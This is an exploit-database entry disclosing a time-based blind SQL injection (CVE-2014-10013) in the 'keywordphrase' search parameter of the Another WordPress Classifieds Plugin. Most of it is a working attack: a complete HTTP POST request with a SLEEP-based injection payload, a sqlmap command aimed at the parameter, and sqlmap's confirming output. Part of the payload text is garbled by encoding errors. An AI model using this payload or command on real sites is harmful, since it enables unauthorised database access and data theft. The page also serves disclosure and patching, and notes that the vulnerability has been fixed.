WordPress Plugin Another WordPress Classifieds Plugin - SQL Injection



EKU-ID: 39848 CVE: OSVDB-114412;CVE-2014-10013 OSVDB-ID:
Author: dill Published: 2014-11-10 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


Exploit Title: Another Wordpress Classifieds Plugin sql injection and Cross Site Scripting
Author: dill
download: https://wordpress.org/plugins/another-wordpress-classifieds-plugin/Client
Webpage: http://awpcp.com/


SQL injection
Details:
The parameter "keywordphrase" is susceptible to a time-based blind SQL injection when doing a search for classifieds.

Proof-of-Concept (PoC)
Request:
POST /?page_id=16592 HTTP/1.1
Host: vulnerable.server
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://vulnerable.server/?page_id=16592
Cookie: wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-1=1407957654; wp-settings-time-2=1408136814; PHPSESSID=uk871e0cssdnca8oesorbmg2b6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 371
a=dosearch&keywordphrase=k'||(SELECT 'ICab' FROM DUAL WHERE 6152=6152 AND SLEEP(5))||'&searchcategory=&searchname=&searchpricemin=1&searchpricemax=2&select-country0.2917955784677633=&textfield-country0.2917955784677633=country甶ons[0][country]=country&select-state0.3360776012424508=&textfield-state0.3360776012424508=state甶ons[0][state]=State&select-city0.8672109586380441=&textfield-city0.8672109586380441=city甶ons[0][city]=city

Exploit through sqlmap:
Copy post request to text file
sqlmap -r keywordphrase.txt -p keywordphrase --dbms=MySQL --level=5

-----------------
Place: POST
Parameter: keywordphrase
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: a=dosearch&keywordphrase=k'||(SELECT 'ICab' FROM DUAL WHERE 6152=6152 AND SLEEP(5))||'&searchcategory=&searchname=&searchpricemin=1&searchpricemax=2&select-country0.2917955784677633=&textfield-country0.2917955784677633=country甶ons[0][country]=country&select-state0.3360776012424508=&textfield-state0.3360776012424508=State甶ons[0][state]=State&select-city0.8672109586380441=&textfield-city0.8672109586380441=City甶ons[0][city]=City

Resolution: Developer was contacted and has since corrected the issues. Update to the latest version of the plugin